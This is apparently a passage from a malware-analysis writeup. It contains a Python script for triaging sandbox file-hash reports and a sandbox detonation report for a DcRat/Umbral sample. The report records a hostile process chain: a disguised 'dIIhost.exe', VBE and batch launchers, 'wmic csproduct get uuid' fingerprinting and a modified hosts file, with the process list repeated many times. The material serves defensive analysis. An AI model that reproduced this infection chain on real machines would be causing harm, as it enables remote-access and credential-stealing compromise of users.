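C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
| MD5 | c05f91c69a98089ded3951424da86771 |
| SHA1 | 0c4c6437efad5f0e1e3e290fb0a9c069cd4a86ed |
| SHA256 | 94c820d3a1216c2ea30f7960f60d8324399a522d3e090711aafc6f5d0b860ac5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dIIhost.exe.log
| MD5 | 4c8fa14eeeeda6fe76a08d14e08bf756 |
| SHA256 | 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5 |
C:\WinRAR\UnZiper.exe
| MD5 | c06bb1f0ea507c8d8767f269725df3c0 |
| SHA256 | 43d0e85345ce2caf4c9b2805c7e5da6a6f7c523f256a46cfeebea9a0eb4f5dce |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 4028457913f9d08b06137643fe3e01bc |
| SHA256 | 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58 |
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Files the PowerShell/.NET runtime writes by itself; their hashes vary per run.
NOISE = (
    re.compile(r"\\PowerShell\\StartupProfileData-NonInteractive$", re.I),
    re.compile(r"\\CLR_v4\.0\\UsageLogs\\[^\\]+\.log$", re.I),
    re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I),
)
# A UsageLog is named after the managed executable that produced it.
USAGELOG = re.compile(r"\\CLR_v4\.0\\UsageLogs\\([^\\]+)\.log$", re.I)


def parse_files(text):
    """Return [{'path': str, 'hashes': {ALGO: hex}}] in report order; memory dumps are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("memory/"):
            continue
        if line.startswith("|"):
            cells = [c.strip() for c in line.strip("|").split("|")]
            if len(cells) != 2 or not entries:
                continue
            algo, value = cells[0].upper(), cells[1].lower()
            if len(value) == HASH_LEN.get(algo) and re.fullmatch(r"[0-9a-f]+", value):
                entries[-1]["hashes"][algo] = value
            continue
        entries.append({"path": line, "hashes": {}})
    return entries


def classify(path):
    if any(p.search(path) for p in NOISE):
        return "runtime-noise"
    if path.lower().startswith("c:\\windows\\"):
        return "system-file-modified"
    return "dropped-artifact"


def triage(text):
    """Group entries by class; each group maps path -> SHA256 (None if the row was absent)."""
    groups = {"dropped-artifact": {}, "system-file-modified": {}, "runtime-noise": {}}
    for e in parse_files(text):
        groups[classify(e["path"])][e["path"]] = e["hashes"].get("SHA256")
    return groups


def dotnet_executables(text):
    """Names of managed executables that ran, recovered from CLR UsageLogs filenames."""
    return {m.group(1) for e in parse_files(text) if (m := USAGELOG.search(e["path"]))}


def hash_list(text):
    """Flat SHA256 list of dropped and modified files, for blocking or hunting."""
    g = triage(text)
    return sorted(h for cls in ("dropped-artifact", "system-file-modified") for h in g[cls].values() if h)


if __name__ == "__main__":
    for cls, paths in triage(SAMPLE).items():
        print(cls, len(paths))
    print("managed executables:", sorted(dotnet_executables(SAMPLE)))
```

The UsageLogs trick is worth keeping even though the logs themselves are noise: the report's own list names SolaraBootstrapper.exe.log, dIIhost.exe.log and UnZiper.exe.log, which confirms all three dropped binaries are .NET and were actually executed, independent of the process list.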
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 04:50
Reported
2024-06-28 04:52
Platform
win7-20240221-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WinRAR\UnZiper.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WinRAR\UnZiper.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
